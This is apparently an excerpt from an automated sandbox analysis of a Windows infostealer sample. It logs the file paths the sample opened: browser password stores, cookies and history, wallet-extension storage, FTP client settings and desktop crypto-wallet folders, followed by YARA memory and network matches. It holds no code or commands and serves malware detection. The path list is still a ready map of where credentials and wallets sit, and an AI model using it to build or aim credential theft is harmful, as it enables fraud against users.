Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Directory queried: C:\Users\user\Documents
Source: Yara match File source: 00000000.00000003.1597829853.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1597724019.00000000014E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0zBsv1tnt4.exe PID: 1868, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: 0zBsv1tnt4.exe PID: 1868, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR